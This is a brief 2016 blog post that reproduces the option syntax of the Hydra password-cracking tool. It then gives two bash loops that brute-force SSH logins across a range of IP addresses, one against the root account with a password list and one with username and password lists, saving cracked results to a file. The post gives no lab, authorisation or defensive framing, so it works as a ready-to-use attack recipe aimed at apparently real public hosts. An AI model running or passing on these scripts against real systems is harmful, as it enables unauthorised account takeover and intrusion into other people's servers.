Monday, March 28, 2016

Hydra - Commands

Hydra - Commands

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT                 ] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Sample 1: Log in with user: root from the random password file
#!/bin/bash
for i in 124.124.124.{167..205}
do
hydra $i ssh -l root -P top50.txt -s 22 -vV
done

Sample2: Log in with the random users and passwords from file
#!/bin/bash
for i in 124.124.124.{167..205}
do
hydra -L /opt/hydra/users.txt -P /opt/hydra/passwords.txt -e ns -v -o /opt/hydra/hashcrack-ssh.txt $i  ssh
done

Ok, Let go on more.

No comments:

Post a Comment